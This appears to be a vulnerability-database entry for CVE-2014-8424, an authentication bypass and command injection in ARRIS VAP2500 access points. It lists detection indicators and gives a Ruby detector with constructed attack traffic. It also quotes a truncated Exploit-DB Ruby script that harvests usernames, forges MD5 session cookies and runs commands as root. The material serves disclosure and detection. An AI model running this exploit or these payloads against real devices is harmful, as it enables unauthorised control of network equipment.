CVE-2014-8424
Published: 2014-11-28
ARRIS VAP2500 before FW08.41 does not properly validate passwords, which allows remote attackers to bypass authentication.
Priority: P2 (73) · Severity: high · CVSS 2.0 base score: 7.8 · Vector: AV:N/AC:L/Au:N/C:C/I:N/A:N
Exploit: public exploit available · EPSS: 59.62% (99.0th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arris | vap2500_firmware | <= 08.41 | — |
Detection & IOCs (extracted from sources)
- Detect unauthenticated GET requests to /admin.conf, which exposes the user account listing on vulnerable ARRIS VAP2500 devices.
- Detect POST requests to /tools_command.php containing the parameter 'txt_command='; this is the OS command injection vector on the VAP2500 management portal.
- Detect HTTP requests to /tools_command.php where the Cookie header contains 'p=' followed by a 32-character hex string (an MD5 hash), which is the authentication bypass mechanism.
- Alert on a POST body containing 'cmb_header=&txt_command=' sent to /tools_command.php as a strong indicator of active exploitation.
- Monitor for telnet being re-enabled on the device: look for removal of /mnt/jffs2/telnet-disabled and execution of /etc/init.d/S42inetd, which is a post-exploitation persistence step.
- Alert on a response body containing 'Starting inetd' from /tools_command.php, indicating successful telnet enablement after exploitation.
- The authentication bypass only works against ARRIS VAP2500 firmware versions prior to FW08.41; devices running FW08.41 or later are not affected.
- The bypass requires a valid username to exist on the device; the exploit first harvests usernames from /admin.conf before constructing the MD5 cookie value.
- Command execution via tools_command.php requires the authenticated session cookie (p=MD5(username)); the auth bypass and command injection are chained, and neither alone is sufficient for full exploitation.
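As an added example (not part of the CVE record, the Exploit-DB script or the Metasploit module), the following Ruby detector applies the HTTP-side indicators listed above to request/response records. The record field names (:method, :path, :cookie, :body, :response) and the sample traffic are constructed for this example; the on-device telnet indicators (removal of /mnt/jffs2/telnet-disabled, execution of /etc/init.d/S42inetd) need host-side monitoring and are out of its scope.

```ruby
# Cookie header carrying p=<32 hex chars> (the p=MD5(username) bypass cookie),
# whether it is the only cookie or one among several.
BYPASS_COOKIE = /(?:\A|;\s*)p=[0-9a-f]{32}(?=;|\z)/i

# rec is a Hash with :method, :path, :cookie, :body and :response, as a
# reverse proxy or IDS HTTP log might supply them (assumed field names).
def vap2500_indicators(rec)
  hits = []
  path, body, cookie = rec[:path].to_s, rec[:body].to_s, rec[:cookie].to_s
  if rec[:method] == 'GET' && path == '/admin.conf' && cookie.empty?
    hits << 'unauthenticated /admin.conf user listing'
  end
  if path == '/tools_command.php'
    hits << 'p=MD5(username) auth-bypass cookie' if cookie =~ BYPASS_COOKIE
    if rec[:method] == 'POST'
      hits << 'txt_command= command injection' if body.include?('txt_command=')
      hits << 'cmb_header=&txt_command= active exploitation' if body.include?('cmb_header=&txt_command=')
    end
    hits << 'Starting inetd: telnet re-enabled' if rec[:response].to_s.include?('Starting inetd')
  end
  hits
end

# Returns [[index, [indicators...]], ...] for the records that matched anything.
def scan(records)
  records.each_with_index.map { |r, i| [i, vap2500_indicators(r)] }.reject { |_, h| h.empty? }
end

# Constructed sample traffic (not captured from a real device).
FAKE_COOKIE = 'p=' + ('0123456789abcdef' * 2)
SAMPLE = [
  { method: 'GET',  path: '/admin.conf',        cookie: '',                        body: '',                               response: 'admin,...' },
  { method: 'POST', path: '/tools_command.php', cookie: FAKE_COOKIE,               body: 'cmb_header=&txt_command=whoami', response: 'root' },
  { method: 'POST', path: '/tools_command.php', cookie: "#{FAKE_COOKIE}; lang=en", body: 'cmb_header=&txt_command=',      response: 'Starting inetd' },
  { method: 'GET',  path: '/index.php',         cookie: 'PHPSESSID=deadbeef',      body: '',                               response: '' },
]

if __FILE__ == $0
  scan(SAMPLE).each { |i, hits| puts "record #{i}: #{hits.join(' | ')}" }
end
```

Records 0 to 2 each raise at least one indicator, while the ordinary /index.php request raises none; the cookie check still fires when the bypass cookie is one of several cookies on the request.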
No detection rules found.
Exploit-DB
Arris VAP2500 - Authentication Bypass
CVE-2014-8425 · exploitdb · 2014-11-25
---
```ruby
#!/usr/bin/env ruby
require 'net/http'
require 'digest/md5'

if !ARGV[0]
  puts "Usage: #{$0} <host>"
  exit(0)
end

host = ARGV[0]
new_pass = "h4x0r3d!"
http = Net::HTTP.new(host).start

# /admin.conf is served without authentication; each line starts with a
# username followed by a comma, so keep only the part before the first comma.
users = http.request_get("/admin.conf").body.split("\n").map! { |user| user.sub(/^(.*?),.*$/, "\\1") }
if users
  puts "[*] found user accounts: #{users.inspect}"
  puts "[*] checking for root privs"
else
  puts "[!!!] could not find any user accounts. exiting."
  exit(-1)
end

# The portal accepts p=MD5(username) as a session cookie; try each harvested
# user against tools_command.php and keep the first one that runs as root.
root_privs = nil
users.each { |user|
  if http.request_post("/tools_command.php", "cmb_header=&txt_command=whoami", { "Cookie" => "p=#{Digest::MD5.hexdigest(user)}" }).body =~ /root/
    puts "[*] root privs found: #{user}"
    root_privs = user
    break
  end
}

if !root_privs
  puts "[!!!] could not find a root pri
```
Metasploit
Arris VAP2500 tools_command.php Command Execution
Source: metasploit
Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an MD5 hash of a valid username.
No writeups or analysis indexed.